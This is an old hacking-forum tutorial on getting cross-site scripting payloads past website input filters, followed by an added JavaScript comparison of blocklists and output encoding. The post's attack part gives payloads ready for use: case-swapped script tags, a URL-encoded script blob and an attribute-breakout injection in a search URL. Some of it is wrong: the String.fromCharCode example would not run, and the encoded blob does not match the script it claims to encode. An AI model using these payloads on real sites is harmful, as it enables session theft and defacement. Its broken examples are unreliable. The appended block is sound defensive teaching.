Sec_rity without U
Bypassing XSS Filters
kinggkong | Date: Friday, 2011-12-23, 11:37 PM | Message # 1
For educational purposes only. I do not condone illegal activity.

Today I am going to teach you how to bypass cross-site scripting filters. For our slow internet members like myself, cross-site scripting filters are webmasters' sorry attempt at protecting their sites from XSS attacks. They work by not allowing certain words or characters that are known to be used in XSS attacks. I am going to go over some common filters, and the methods used to bypass them.

Word Filters: Word filters are designed to filter out certain words such as alert or script. Most are simple to bypass. To bypass these filters you can change the characters of the script.

Original...
Code
<script>alert('InterN0T')</script>
Change to...
Code
<sCrIpT>aLeRt('InterN0T')</ScRiPt>

magic_quotes_gpc: This filter does not allow certain characters such as ", / and '. To bypass this filter we use String.fromCharCode(). We write our code inside the () encoded in ASCII.

Original...
Code
<script>alert('InterN0T')</script>
Change to...
Code
<script>String.fromCharCode('InterN0T')</script>
Note: 'InterN0T' needs to be in ASCII form.

Converting into full HTML: Sometimes filters will limit multiple characters including <. Most of the time you can bypass them by converting the string into full HTML.

Original...
Code
<script>alert('InterN0T')</script>
Change to...
Code
%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%6
3%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%
73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C
%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3
D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%
6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64
%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%3
1%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%
61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E

Bypass by experimentation: Most filters can be bypassed. Sometimes you have to mess around with it. A lot of times you can just add "> before the script to close out current fields. Then inject it with...
Code
www.website.com/search.php?="><script>alert('InterN0T')</script>
This is a really simple tutorial on the most simple method of website hacking. I couldn't find any threads on InterN0T about bypassing XSS filters, so I thought I would contribute. Hope this helped.
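Added example (not part of the original post or any project it mentions): a case-sensitive word blocklist of the kind the post describes, placed beside contextual HTML output encoding, both run over the post's own payload variants (constructed here as sample input) to show which inputs each approach actually neutralises. The function names and the filter-then-decode ordering are assumptions made for the illustration.

```javascript
// Blocklist "word filter" as described in the post: drop the input if it
// contains one of a few banned lowercase tokens.
function naiveWordFilter(input) {
  const banned = ["<script", "alert("];
  return banned.some((w) => input.includes(w)) ? "" : input;
}

// Common ordering mistake (assumed for illustration): the filter inspects the
// raw query-string value, and only afterwards is the value URL-decoded for use.
function filterThenDecode(rawParam) {
  return decodeURIComponent(naiveWordFilter(rawParam));
}

// Mitigation: contextual output encoding. Every character that can change the
// HTML parsing context becomes an entity, so the "words" in the input no longer
// matter; nothing can open a tag or close a double-quoted attribute.
function encodeForHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(input).replace(/[&<>"']/g, (c) => map[c]);
}

// Would this output still open a tag or break out of a double-quoted attribute?
function stillDangerous(output) {
  return /[<>"]/.test(output);
}

// Constructed samples taken from the post's examples; the last one is the same
// payload as it would arrive URL-encoded in a query string.
const SAMPLES = {
  plain: "<script>alert('InterN0T')</script>",
  mixedCase: "<sCrIpT>aLeRt('InterN0T')</ScRiPt>",
  attrBreakout: "\"><script>alert('InterN0T')</script>",
  urlEncoded: "%3Cscript%3Ealert%28%27InterN0T%27%29%3C%2Fscript%3E",
};

// For each sample, report whether the handler still leaves dangerous output.
function evaluate(handler) {
  const result = {};
  for (const [name, value] of Object.entries(SAMPLES)) {
    result[name] = stillDangerous(handler(value));
  }
  return result;
}

// Blocklist: plain and attrBreakout are caught, mixedCase and urlEncoded slip through.
const blocklistResult = evaluate(filterThenDecode);
// Encoding after decoding: nothing dangerous remains for any sample.
const encodingResult = evaluate((s) => encodeForHtml(decodeURIComponent(s)));
```

The blocklist only ever matches the exact spellings it was given, which is exactly what the case-change and encoding tricks in the post exploit; the encoder makes the question of which words appear irrelevant.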